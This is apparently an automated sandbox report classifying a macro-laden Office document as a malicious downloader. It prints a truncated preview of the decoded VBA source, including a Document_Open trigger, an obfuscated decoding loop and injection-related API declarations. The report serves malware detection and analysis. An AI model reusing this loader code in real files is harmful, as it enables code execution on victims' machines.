Verdict: MALICIOUS
Risk Score: 122

Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The ClamAV heuristic also flags it as a downloader. While the VBA code is obfuscated, the presence of a Document_Open macro and the downloader heuristic strongly suggest it's designed to fetch and execute further malicious content. No specific family could be identified.
Heuristics (4)
- ClamAV: Doc.Downloader.Macro-6539595-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12238 bytes | 441c04f2853a3537759cd73f044be137a5f8ecb83d23bf14a6278bc04b8d0f1e |

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
monolithic nability = 30 + 25
Pmt 0, nability, 13170, 22451, 5
End Sub
Attribute VB_Name = "sustainability"
Function prompting(clinal) As String
Dim page(6962) As Byte
quicker = "trialanderror"
Dim centrex As Long
Dim insider As Long
Dim deadlocked(63) As Long
Dim malcolmia() As Byte
Dim alloyed(63) As Long
Dim sutler As String
Dim antisemitic As Integer
Dim adonize As Long
Dim aneides As Long
Dim debole(63) As Long
disputare = 23 - 4 + 45
grass = 16 - 104 + 4184
hamiform = 77 - 42 + 16711645
cutworm = 104 - 23 + 174
Dim leechcraft As String
adapid = 125 - 19 + 65174
bloomer = 32 - 99 + 130
parsiism = 105 - 7 + 262046
nymphet = 13 - 107 + 65630
attached = 67 - 7 + 16515012
cyclical = 75 - 122 + 303
kuchean = 22 - 10 + 258036
Dim baby As Byte
Dim majorca As Variant
herr = 83 - 104 + 4053
Dim agkistrodon As Integer
antiinflammatory = 23 - 1 + 7821
Dim cognizance() As Byte
cognizance = VBA.StrConv(clinal, 120 + 8)
bellpull = 59 + 18
Pmt 0, bellpull, 16141, 29307, 2
multipartite = 7843
nolle = vbKeyShift - 12
For abrasion = 0 To multipartite
If abrasion Mod 2 = 0 Then
cognizance(abrasion) = cognizance(abrasion) - nolle
Else
cognizance(abrasion) = cognizance(abrasion) - (nolle - 1)
End If
Next abrasion
casting = 19 + 23
Pmt 0, casting, 11357, 52754, 5
antisemitic = 0
weregild = lonas
For centrex = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
deadlocked(centrex) = anthem(centrex, disputare, 39)
debole(centrex) = anthem(centrex, grass, 39)
alloyed(centrex) = anthem(centrex, parsiism, 39)
Next centrex
myopus = 56 + 37
Pmt 0, myopus, 2095, 15697, 7
malcolmia = cognizance
shines = 2 - 70 + 72
pa = 20 + 38
Pmt 0, pa, 22816, 13328, 8
deliver = 4 - 38 + 37
stern = Fix(207)
stern = Rnd(110)
coverture = deliver + 1
cacodylic = 48 - 77 + 31
For adonize = 0 To multipartite
panhandler = malcolmia(adonize)
colloquialism = malcolmia(adonize + 2)
brier = debole(weregild(malcolmia(adonize + 1)))
bract = deadlocked(weregild(colloquialism)) + weregild(malcolmia(adonize + deliver))
insider = alloyed(weregild(panhandler)) + brier + bract
centrex = anthem(insider, hamiform, 31)
page(aneides) = anthem(centrex, nymphet, 21)
centrex = anthem(insider, adapid, 31)
page(aneides + 1) = anthem(centrex, cyclical, 21)
page(aneides + cacodylic) = anthem(insider, cutworm, 31)
aneides = aneides + cacodylic + 1
adonize = adonize + 3
Next
prompting = page
End Function
Attribute VB_Name = "samui"
#If (19 - 123 + 504 + 30 - 7 + 277) > ((62 - 30 + 288) - (92 - 114 + 562) * 1) And ((33 - 30 + 25) - (118 - 15 - 75)) * 2 < (Win64) Then
Public Declare PtrSafe Function assumiing _
Lib "Shlwapi.dll " Alias _
"GetOverlappedResult" (ByVal minotaur As Any, kennel As Any, stranger As Any, closepacked As Any) As LongPtr
Public Declare PtrSafe Function necropsy _
Lib "Ntdll " Alias _
"NtWriteVirtualMemory" (ByVal purveyance As Any, ByVal haymaker As Any, ByVal barter As Any, ByVal iconography As Any, ByVal aminoaciduria As Any) As LongPtr
#ElseIf (58 - 95 + 437 + 111 - 25 + 214) > ((116 - 109 + 313) - (92 - 7 + 455) * 1) And Not ((45 - 44 + 27) - (94 - 11 - 55)) * 2 < (Win64) Then
Public Declare Function disjointedly _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (axially As Any, ByVal prolongation As Any, ByVal countersign As Any, ByVal facsimile As Any, ByVal atlantes As Any, ByVal benin As Any, ByVal forfeited As Any) As Long
Public Declare Function dough _
Lib "Shlwapi.dll " Alias _
"SleepConditionVariableSRW" (ByVal postnate As Any, affectibility As Any, octuple As Any, deviating As Any) As Long
#End If
Function lonas()
Dim elamitic(255) As Byte
consolidated = 124 - 10 - 49
For i = consolidated To (8 - 123 + 206)
ela ... (truncated)
```